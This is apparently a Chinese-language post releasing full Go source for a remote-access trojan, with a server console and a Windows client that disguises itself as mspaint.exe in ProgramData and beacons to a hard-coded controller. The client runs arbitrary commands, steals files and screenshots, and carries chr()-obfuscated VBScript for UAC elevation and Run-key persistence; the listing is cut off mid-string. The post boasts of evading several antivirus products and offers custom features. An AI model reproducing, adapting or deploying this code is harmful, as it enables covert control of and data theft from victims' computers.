0x01 工具介紹
由于工作需要,寫了一款 Golang 遠控軟件,現在也用不上了,開源算了。支持的功能有「截圖回傳、反向 Socks5 代理回內網、開機自啟」等。需要說明的是,原文所說的「加密傳輸」實際上只是 Base64 編碼(server.go / client.go 都只引入了 encoding/base64,沒有任何 crypto 或 TLS),指令、連接密碼和回傳的文件內容在鏈路上都是可直接還原的明文。
當 client.exe 被點擊後,小馬會自動複製本身到 C:\ProgramData 目錄(文件名偽裝為 mspaint.exe)並再次執行;至於「自動刪除當前桌面上的 Client 文件」,代碼中對應的 os.Remove 目前是被註釋掉的,實際只對原文件做了 chmod,並不會刪除。
目前大多數(shù)遠控軟件都基于C++/C#編寫的,殺軟對這些開發(fā)語言很敏感,非常容易就被識別出來了,但使用Golang語言編寫的就不一樣了,改一改就能過360、火絨、金山、騰訊電腦管家、AVG、等等,如有需要添加其他功能,可以私我哦。。。Py
0x02 目前的功能
- 多用戶上線,多用戶管理
- 下載遠程文件
- 上傳本地文件到目標電腦
- 屏幕截圖,回傳
- 動態(tài)設(shè)置編碼
- 執(zhí)行系統(tǒng)任意指令
- 安裝成服務(wù),實現(xiàn)開機自啟[x]
- 反向socks5[x]
- EXE文件捆綁[x]
0x05 過殺軟情況
火絨查殺

image.png
微步在線惡意文件檢測

image.png
VirSCAN.org-多引擎在線病毒掃描

image.png
0x03 服務(wù)端代碼 server.go
package main
import (
"bufio"
"encoding/base64"
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"sync"
"time"
)
// ANSI SGR escape sequences used to colour the operator console, plus the
// tool's version string (printed nowhere in this listing).
const (
	WHITE   = "\x1b[37;1m"
	RED     = "\x1b[31;1m"
	GREEN   = "\x1b[32;1m"
	YELLOW  = "\x1b[33;1m"
	BLUE    = "\x1b[34;1m"
	MAGENTA = "\x1b[35;1m"
	CYAN    = "\x1b[36;1m"
	VERSION = "2.5.0"
)
// Process-wide state of the server. Everything below is shared between the
// operator loop in main() and one connection() goroutine per client.
var (
	inputIP   = flag.String("IP", "0.0.0.0", "Listen IP")
	inputPort = flag.String("PORT", "53", "Listen Port") // the client hard-codes port 53 too; plain TCP, not DNS
	connPwd   = flag.String("PWD", "18Sd9fkdkf9", "Connection Password") // shared secret checked in handleConnWait; sent base64-encoded, not encrypted
	counter   int // session counter; its value is the key into the two maps below
	connlist       map[int]net.Conn = make(map[int]net.Conn) // every live session
	connlistIPAddr map[int]string   = make(map[int]string)   // remote address per session, shown in the prompt
	lock = &sync.Mutex{} // guards counter/connlist/connlistIPAddr; NOTE(review): main() reads the maps and the EOF path in connection() deletes from them without taking it
	downloadOutName string // local output name for the next "download"; set in main(), read in connection(), shared by all sessions
)
// getDateTime returns the current local time as "YYYY-MM-DD-hh-mm-ss", a
// filesystem-safe stamp used to suffix downloaded files and screenshots.
func getDateTime() string {
	const stampLayout = "2006-01-02-15-04-05" // Go reference-time layout
	return time.Now().Format(stampLayout)
}
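// stdinReader wraps os.Stdin exactly once. The previous implementation built
// a fresh bufio.Reader on every call, which silently discarded any bytes the
// reader had buffered beyond the first line (piped or pasted input).
var stdinReader *bufio.Reader

// ReadLine blocks until one line is available on stdin and returns it with
// the trailing "\r\n" / "\n" removed. When stdin is closed (EOF with nothing
// pending) the process exits: the console loop in main() has nothing left to
// read and would otherwise spin forever on empty input. Any other read error
// is reported and yields "".
func ReadLine() string {
	if stdinReader == nil {
		stdinReader = bufio.NewReader(os.Stdin)
	}
	line, err := stdinReader.ReadString('\n')
	line = strings.TrimRight(line, "\r\n")
	switch {
	case err == nil:
		return line
	case err == io.EOF:
		if line != "" {
			return line // final line without a trailing newline
		}
		fmt.Println(RED, "[!] stdin closed, exiting")
		os.Exit(0)
	default:
		fmt.Println(RED, "[!] Error to Read Line!")
	}
	return ""
}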
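// connection services one authenticated client for the lifetime of its socket.
// It registers the session in connlist/connlistIPAddr under lock, then reads
// newline-terminated base64 frames: a "download" or "screenshot" frame
// announces that the next frame is a file body, which is written into the
// server's working directory; any other frame is command output and is printed.
//
// The client, not the operator, drives this state machine: anyone holding the
// connection password can push a file frame at any time, so the bytes written
// here are client-controlled data and must be treated as untrusted (stored
// owner-only, never opened or executed blindly). The file name is never taken
// from the client — it comes from downloadOutName (operator input, shared by
// all sessions) or from the socket's remote address.
func connection(conn net.Conn) {
	defer conn.Close()

	myip := conn.RemoteAddr().String()
	lock.Lock()
	counter++
	myid := counter
	connlist[myid] = conn
	connlistIPAddr[myid] = myip
	lock.Unlock()
	fmt.Printf("--- client: %s connection ---\n", myip)

	// Deregister under the same lock that registered us; the old code deleted
	// from the maps without it, racing with main() and other sessions.
	defer func() {
		lock.Lock()
		delete(connlist, myid)
		delete(connlistIPAddr, myid)
		lock.Unlock()
		fmt.Printf("--- %s close---\n", myip)
	}()

	// One reader for the whole session: wrapping conn in a new bufio.Reader on
	// every read (as before) can buffer bytes of the following frame and then
	// throw them away together with the reader.
	reader := bufio.NewReader(conn)

	// receiveFile reads the frame that follows a "download"/"screenshot"
	// marker and stores it under name in the working directory. The returned
	// error is a transport error only; a malformed frame or a failed write is
	// reported and swallowed (empty path) so the session stays usable.
	receiveFile := func(name string) (string, error) {
		line, err := reader.ReadString('\n')
		if err != nil {
			return "", err
		}
		data, err := base64.URLEncoding.DecodeString(line) // the decoder skips the trailing '\n'
		if err != nil {
			fmt.Println(RED, "[!] malformed file frame from", myip, ":", err)
			return "", nil
		}
		outPath, err := filepath.Abs(name)
		if err == nil {
			// 0600, not the old literal 777 (decimal, i.e. mode 1411): loot is
			// for the operator only and must at least be readable by them.
			err = ioutil.WriteFile(outPath, data, 0600)
		}
		if err != nil {
			fmt.Println(RED, "[!] write failed:", err)
			return "", nil
		}
		return outPath, nil
	}

	for {
		line, err := reader.ReadString('\n')
		if err != nil {
			// EOF is the normal disconnect; anything else (reset, timeout) is
			// worth a line on the console. Either way the session is over —
			// the old code only handled EOF and looped forever on other errors.
			if err != io.EOF {
				fmt.Println(RED, "[!] read error from", myip, ":", err)
			}
			return
		}
		decoded, err := base64.StdEncoding.DecodeString(line)
		if err != nil {
			fmt.Println(RED, "[!] malformed frame from", myip, ":", err)
			continue
		}
		switch string(decoded) {
		case "download":
			fmt.Println(YELLOW, "-> Downloading...")
			// downloadOutName is whatever the operator typed for the most
			// recent download request; it is shared across sessions.
			outPath, err := receiveFile(downloadOutName + getDateTime())
			if err != nil {
				return
			}
			if outPath != "" {
				fmt.Printf(GREEN+"-> Download Done, filename: %s\n", outPath)
			}
		case "screenshot":
			fmt.Println(YELLOW, "-> Getting ScreenShot...")
			outPath, err := receiveFile(strings.Replace(myip, ":", "_", -1) + getDateTime() + ".png")
			if err != nil {
				return
			}
			if outPath != "" {
				fmt.Printf(GREEN+"-> ScreenShot Done, filename: %s\n", outPath)
			}
		default:
			fmt.Println("\n" + string(decoded))
		}
	}
}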
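// handshakeTimeout bounds how long a freshly accepted socket may take to send
// its password frame; maxHandshakeBytes bounds that frame's size. Without
// them a peer that connects and never writes (a scanner, a half-open socket)
// or that streams garbage would hold a handshake open indefinitely.
const (
	handshakeTimeout  = 10 * time.Second
	maxHandshakeBytes = 1024
)

// readHandshakeFrame reads up to (excluding) the first '\n' from conn, one
// byte at a time. It deliberately avoids bufio so nothing beyond the handshake
// line is consumed: connection() wraps the socket in its own reader afterwards
// and must see every byte that follows the password.
func readHandshakeFrame(conn net.Conn, limit int) (string, error) {
	line := make([]byte, 0, 64)
	b := make([]byte, 1)
	for len(line) < limit {
		if _, err := io.ReadFull(conn, b); err != nil {
			return "", err
		}
		if b[0] == '\n' {
			return string(line), nil
		}
		line = append(line, b[0])
	}
	return "", fmt.Errorf("handshake frame exceeds %d bytes", limit)
}

// handshake authenticates one accepted socket: the first frame must base64
// (standard alphabet) decode to connPwd. On success the socket becomes a
// session via connection(); otherwise a "back" frame is written and the socket
// is closed. The password is only base64-encoded on the wire — not encrypted
// or hashed — so anyone observing the traffic can replay it.
func handshake(conn net.Conn) {
	conn.SetReadDeadline(time.Now().Add(handshakeTimeout))
	frame, err := readHandshakeFrame(conn, maxHandshakeBytes)
	if err != nil {
		log.Printf("handshake from %s failed: %v", conn.RemoteAddr(), err)
		conn.Close()
		return
	}
	conn.SetReadDeadline(time.Time{}) // session reads are unbounded, as before

	decoded, err := base64.StdEncoding.DecodeString(frame)
	if err == nil && string(decoded) == *connPwd {
		connection(conn)
		return
	}
	backMsg := base64.URLEncoding.EncodeToString([]byte("back"))
	conn.Write([]byte(backMsg + "\n"))
	conn.Close()
}

// handleConnWait listens on inputIP:inputPort and hands every accepted socket
// to handshake() on its own goroutine, so one slow or silent peer can no
// longer stall the accept loop for everyone else (the old code read the
// password synchronously, with no deadline, before starting the session).
// A permanent listener error is still fatal; transient accept errors are
// logged and retried after a short pause.
func handleConnWait() {
	l, err := net.Listen("tcp", *inputIP+":"+*inputPort)
	if err != nil {
		log.Fatal(err)
	}
	defer l.Close()
	for {
		conn, err := l.Accept()
		if err != nil {
			if ne, ok := err.(net.Error); ok && ne.Temporary() {
				log.Println("accept:", err)
				time.Sleep(100 * time.Millisecond)
				continue
			}
			log.Fatal(err)
		}
		go handshake(conn)
	}
}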
// main parses the flags, starts the listener and runs the operator console.
// connid is the session selected with "session"; it starts at 0, which is
// never a valid key, so anything typed before a session is chosen is dropped
// silently (ok is false). Commands not handled here are forwarded verbatim to
// the selected client, which runs them as a process.
//
// NOTE(review): connlist and connlistIPAddr are read here while connection()
// writes them from other goroutines without holding lock — a data race
// (`go run -race` will report it).
func main() {
	flag.Parse()
	go handleConnWait()
	connid := 0
	for {
		fmt.Print(RED, "SESSION ", connlistIPAddr[connid], WHITE, "> ")
		command := ReadLine()
		_conn, ok := connlist[connid]
		switch command {
		case "":
			// Empty input: nothing to do.
		case "help":
			// "startup" is listed but has no case below: it falls into default
			// and is sent to the client as a command literally named startup.
			fmt.Println("")
			fmt.Println(CYAN, "COMMANDS DESCRIPTION")
			fmt.Println(CYAN, "-------------------------------------------------------")
			fmt.Println(CYAN, "session 選擇在線的客戶端")
			fmt.Println(CYAN, "download 下載遠程文件")
			fmt.Println(CYAN, "upload 上傳本地文件")
			fmt.Println(CYAN, "screenshot 遠程桌面截圖")
			fmt.Println(CYAN, "charset gbk 設置客戶端命令行輸出編碼,gbk是簡體中文")
			fmt.Println(CYAN, "clear 清楚屏幕")
			fmt.Println(CYAN, "exit 客戶端下線")
			fmt.Println(CYAN, "quit 退出服務器端")
			fmt.Println(CYAN, "startup 加入啟動項目文件夾")
			fmt.Println(CYAN, "-------------------------------------------------------")
			fmt.Println("")
		case "session":
			fmt.Println(connlist)
			fmt.Print("選擇客戶端ID: ")
			inputid := ReadLine()
			if inputid != "" {
				var e error
				// NOTE(review): Atoi returns 0 on error, so a typo here also
				// resets the selection to "no session".
				connid, e = strconv.Atoi(inputid)
				if e != nil {
					fmt.Println("請輸入數字")
				} else if _, ok := connlist[connid]; ok {
					// A live session was chosen: ask it for its OS banner.
					_cmd := base64.URLEncoding.EncodeToString([]byte("getos"))
					connlist[connid].Write([]byte(_cmd + "\n"))
				}
			}
		case "clear":
			ClearScreen()
		case "exit":
			// Tell the client to terminate; its map entries are removed by
			// connection() once the socket closes.
			if ok {
				encDownload := base64.URLEncoding.EncodeToString([]byte("exit"))
				_conn.Write([]byte(encDownload + "\n"))
			}
		case "quit":
			os.Exit(0)
		case "download":
			if ok {
				// Step 1: send the download command.
				encDownload := base64.URLEncoding.EncodeToString([]byte("download"))
				_conn.Write([]byte(encDownload + "\n"))
				// Step 2: ask for the remote path and the local output name.
				fmt.Print("File Path to Download: ")
				nameDownload := ReadLine()
				fmt.Print("Output name: ")
				// Consumed by connection() when the file frame arrives. It is a
				// single global shared by every session, so overlapping
				// downloads use whichever name was typed last.
				downloadOutName = ReadLine()
				// Send the remote path; the reply is handled in connection().
				encName := base64.URLEncoding.EncodeToString([]byte(nameDownload))
				_conn.Write([]byte(encName + "\n"))
				fmt.Print(encName) // debug echo of the encoded path
			}
		case "screenshot":
			if ok {
				encScreenShot := base64.URLEncoding.EncodeToString([]byte("screenshot"))
				_conn.Write([]byte(encScreenShot + "\n"))
			}
		case "upload":
			if ok {
				encUpload := base64.URLEncoding.EncodeToString([]byte("upload"))
				_conn.Write([]byte(encUpload + "\n"))
				fmt.Print("File Path to Upload: ")
				pathUpload := ReadLine()
				fmt.Print("Output name: ")
				outputName := ReadLine()
				encOutput := base64.URLEncoding.EncodeToString([]byte(outputName))
				// NOTE(review): the timestamp is appended after the base64 text
				// rather than encoded inside it, and the client decodes the name
				// with the standard alphabet, so the '-' characters of the date
				// break its decode part-way; the remote file name will not be
				// outputName + timestamp — confirm with a real run.
				_conn.Write([]byte(encOutput + getDateTime() + "\n"))
				fmt.Println(YELLOW, "-> Uploading...")
				// Read and send the local file. The "upload" command and the
				// name have already gone out, so on a read failure the client
				// is left waiting and will treat the next command line sent to
				// it as the file body.
				file, err := ioutil.ReadFile(pathUpload)
				if err != nil {
					fmt.Println(RED, "[!] File not found!")
					break
				}
				encData := base64.URLEncoding.EncodeToString(file)
				_conn.Write([]byte(string(encData) + "\n"))
				fmt.Println(GREEN, "-> Upload Done...")
			}
		default:
			// Anything else is forwarded unchanged and executed by the client
			// (split on single spaces, no shell — see client.go connect()).
			if ok {
				_cmd := base64.URLEncoding.EncodeToString([]byte(command))
				_conn.Write([]byte(_cmd + "\n"))
			}
		}
	}
}
// ClearScreen clears the operator terminal by running the external `clear`
// command with its output attached to our stdout. A failure to run it (for
// example no such binary on Windows) is ignored and leaves the screen as-is.
func ClearScreen() {
	c := exec.Command("clear")
	c.Stdout = os.Stdout
	_ = c.Run() // best effort
}
0x04 客戶端代碼 client.go
客戶端編譯前,需要更改上線 IP、連接密碼 CONNPWD 這兩個參數,因為只有與服務端的連接密碼相同時,才會建立連接,用來避免建立 Socket 時出現上線誤報。需要注意:這個密碼只是 Base64 編碼後以明文發送(見 client.go 的 connect 函數),能看到流量的人都可以直接重放;同時客戶端也不驗證服務端身份。它只能過濾誤連,不能算作真正的認證。
package main
import (
"bufio"
"bytes"
"context"
"encoding/base64"
"fmt"
"image/png"
"io"
"io/ioutil"
"log"
"net"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"syscall"
"time"
"github.com/axgle/mahonia"
screenshot "github.com/kbinani/screenshot"
)
// Build-time configuration; edit before compiling.
const (
	// IP is the server "host:port" the client dials back to (net.Dial "tcp",
	// so plain TCP even though 53 is the DNS port; it matches the server's
	// default -PORT).
	IP = "192.168.1.209:53"
	// CONNPWD is sent base64-encoded, in the clear, as the first frame and must
	// equal the server's -PWD flag, otherwise the server answers "back".
	CONNPWD = "18Sd9fkdkf9"
)
var (
	// Timeout bounds every command spawned by mCommandTimeOut.
	Timeout = 30 * time.Second
	// charset names the encoding of command output. "charset <name>" from the
	// server changes it; anything other than utf-8 is transcoded to UTF-8
	// before being sent back (see ConvertToString).
	charset = "utf-8"
)
// main is the client entry point. On Windows it first "installs" itself: the
// running binary is copied to %SYSTEMDRIVE%\ProgramData\mspaint.exe (a name
// chosen to resemble the Paint executable), the copy is launched with the
// original path as its only argument, and this process returns. The copy
// recognises itself by path, chmods the path it was given (the os.Remove of
// the original is commented out, so despite the write-up nothing is deleted)
// and then loops on connect() forever. On every other OS it loops on
// connect() directly.
//
// Observable artefacts of this path: a process image at
// <systemdrive>\ProgramData\mspaint.exe and an outbound TCP connection from it
// to IP.
func main() {
	if runtime.GOOS == "windows" {
		targetPath := os.Getenv("systemdrive") + "\\ProgramData\\"
		targetFile := targetPath + "mspaint.exe"
		os.Mkdir(targetPath, os.ModePerm)
		//exec.Command("")
		// Absolute path of the executable that is currently running.
		currentFile, _ := exec.LookPath(os.Args[0])
		currentFileAbs, _ := filepath.Abs(currentFile)
		// Are we already the copy under ProgramData? NOTE(review): this is an
		// exact, case-sensitive string compare of two Windows paths.
		if currentFileAbs == targetFile {
			// Remove the original file (the remove itself is commented out).
			fmt.Println(len(os.Args))
			if len(os.Args) > 1 {
				err := os.Chmod(os.Args[1], 0777)
				if err != nil {
					fmt.Println(err)
				}
				//err = os.Remove(os.Args[1])
				//if err != nil {
				fmt.Println(err)
				//}
			}
			// Start beaconing.
			for {
				connect()
			}
		} else {
			// Does the copy already exist?
			_, err := os.Stat(targetFile)
			if err != nil {
				// Open the source file.
				srcFile, _ := os.Open(currentFile)
				// Create the destination file.
				desFile, err := os.Create(targetFile)
				if err != nil {
					fmt.Println(err)
				}
				// Copy the source into the destination.
				_, err = io.Copy(desFile, srcFile)
				if err != nil {
					fmt.Println(err)
				}
				// Make the copy executable (0777).
				err = os.Chmod(targetFile, 0777)
				if err != nil {
					fmt.Println(err)
				}
				// Not deferred on purpose: the handles must be closed before
				// the copy is executed.
				srcFile.Close()
				desFile.Close()
				// Launch the copy, passing our own path; do not wait for it.
				mCommand(targetFile, currentFileAbs)
				// Open an image (decoy; commented out).
				//mCommand("cmd.exe", "/c", "start", "max.jpg")
				//install_start() // persistence; commented out
			} else {
				// Copy already present: launch it and do not wait.
				mCommand(targetFile, currentFileAbs)
				// Open an image (decoy; commented out).
				//mCommand("cmd.exe", "/c", "start", "max.jpg")
				//install_start() // persistence; commented out
			}
		}
	} else {
		for {
			connect()
		}
	}
}
// install_start is the Windows persistence routine. It is currently unused:
// both call sites in main() are commented out. It drops two VBScript files
// into the current working directory, each assembled from chr() calls so the
// plain text never appears in the binary:
//
//   test.vbs  a small "sudo" helper — Shell.Application.ShellExecute with the
//             "runas" verb, i.e. it re-runs its arguments through a UAC
//             elevation prompt (the user still has to accept it; a section
//             that would have auto-confirmed the prompt with SendKeys "%y" is
//             present but commented out with ').
//   add.vbs   WScript.Shell.Run of
//             reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
//                 /v AUTORUN /t REG_SZ /d C:\ProgramData\mspaint.exe /f
//             once directly and once through test.vbs (elevated), both with
//             vbhide.
//
// add.vbs is executed via "cmd /c" and then deleted; test.vbs is left on disk.
// Detection: a Run value named AUTORUN pointing at C:\ProgramData\mspaint.exe,
// reg.exe spawned under cmd.exe/wscript.exe, and test.vbs/add.vbs in the
// working directory of the dropper.
//
// NOTE(review): the error checks test the wrong variable twice — err instead
// of err2 after the second WriteFile, and err instead of er after os.Remove —
// so those two failures are silently ignored.
func install_start() {
	err := ioutil.WriteFile("test.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(85)&chr(65)&chr(67)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(108)&chr(105)&chr(99)&chr(97)&chr(116)&chr(105)&chr(111)&chr(110)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(60)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(35821)&chr(27861)&chr(58)&chr(32)&chr(32)&chr(115)&chr(117)&chr(100)&chr(111)&chr(32)&chr(60)&chr(99)&chr(111)&chr(109)&chr(109)&chr(97)&chr(110)&chr(100)&chr(62)&chr(32)&chr(91)&chr(97)&chr(114)&chr(103)&chr(115)&chr(93)&chr(34)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(53)&chr(48)&chr(48)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(97)&chr(99)&chr(116)&chr(105)&chr(118)&chr(97)&chr(116)&chr(101)&chr(40)&chr(34)&chr(29992)&chr(25143)&chr(36134)&chr(25143)&chr(25511)&chr(21046)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(73)&chr(102)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(116)&chr(114)&chr(117)&chr(101)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(115)&chr(101)&chr(110)&chr(100)&chr(107)&chr(101)&chr(121)&chr(115)&chr(32)&chr(34)&chr(37)&chr(121)&chr(34)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(33258)&chr(21160)&chr(33719)&chr(21462)&chr(31649)&chr(29702)&chr(21592)&chr(26435)&chr(38480)&chr(22833)&chr(36133)&chr(65292)&chr(35831)&chr(25163)&chr(21160)&chr(30830)&chr(35748)&chr(12290)&chr(34)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(78)&chr(85)&chr(76)&chr(76)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(70)&chr(111)&chr(114)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(111)&chr(32)&chr(40)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(45)&chr(49)&chr(41)&chr(32)&chr(83)&chr(116)&chr(101)&chr(112)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(38)&chr(32)&chr(34)&chr(32)&chr(34)&chr(32)&chr(38)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(41)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(78)&chr(101)&chr(120)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(53)&chr(32)&chr(32)&chr(10)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32))"), 0666)
	if err != nil {
		log.Fatal(err)
	}
	err2 := ioutil.WriteFile("add.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(